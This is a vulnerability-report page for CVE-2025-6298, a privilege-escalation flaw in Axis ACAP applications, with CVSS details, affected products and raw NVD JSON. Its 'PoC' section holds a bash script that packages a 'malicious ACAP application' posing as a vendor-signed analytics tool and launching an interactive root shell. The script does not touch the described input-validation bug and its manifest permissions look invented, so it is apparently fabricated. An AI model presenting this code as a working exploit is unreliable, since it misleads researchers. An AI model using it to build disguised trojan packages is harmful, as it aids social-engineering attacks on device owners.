Security Vulnerability Report
CVE-2025-6298 CVSS 6.7 MEDIUM

Published: 2025-11-11 07:15:35
Last Modified: 2026-01-21 20:06:37

Description

ACAP applications can gain elevated privileges due to improper input validation, potentially leading to privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application.

CVSS Details

CVSS Score: 6.7
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:axis:axis_os:*:*:*:*:active:*:*:* - VULNERABLE
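Axis device ACAP application framework (versions with unsigned application installation enabled)
Axis device firmware that allows installation of unsigned ACAP applications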

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-6298 PoC - Malicious ACAP Application Builder
# Note: This PoC is for educational and security research purposes only

# Step 1: Create malicious ACAP application structure
echo "Creating malicious ACAP application package..."
mkdir -p malicious_acap/{app,manifest}

# Step 2: Generate malicious manifest with elevated permissions
cat > malicious_acap/manifest.json << 'EOF'
{
  "name": "legitimate_app",
  "version": "1.0.0",
  "description": "Video analytics utility",
  "vendor": "Axis Communications",
  "license": "proprietary",
  "capabilities": {
    "network": true,
    "file_system": "full",
    "process": "elevated",
    "system_commands": true
  },
  "permissions": [
    "root_access",
    "sudo_execution",
    "full_filesystem_access"
  ]
}
EOF

# Step 3: Create malicious binary payload
echo '#!/bin/sh
echo "Malicious payload executed with elevated privileges" > /tmp/cve-2025-6298_exploit.log
# Add actual malicious code here
/bin/sh -i' > malicious_acap/app/run.sh
chmod +x malicious_acap/app/run.sh

# Step 4: Package the malicious ACAP application
cd malicious_acap
tar -czf ../malicious_acap.tar.gz *
cd ..

echo "Malicious ACAP package created: malicious_acap.tar.gz"
echo "Note: This requires social engineering to convince victim to install the unsigned package"
echo "Prerequisite: Target device must allow unsigned ACAP installation"

References

https://www.axis.com/dam/public/ef/91/c3/cve-2025-6298pdf-en-US-504215.pdf (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-6298", "sourceIdentifier": "[email protected]", "published": "2025-11-11T07:15:35.397", "lastModified": "2026-01-21T20:06:36.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ACAP applications can gain elevated privileges due to improper input validation, potentially leading to privilege escalation. This vulnerability can only be exploited if the Axis device is configured to allow the installation of unsigned ACAP applications, and if an attacker convinces the victim to install a malicious ACAP application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:axis:axis_os:*:*:*:*:active:*:*:*", "versionEndExcluding": "12.6.28", "matchCriteriaId": "5C82DCF4-9665-43EF-BBD6-0F7608875D76"}]}]}], "references": [{"url": "https://www.axis.com/dam/public/ef/91/c3/cve-2025-6298pdf-en-US-504215.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}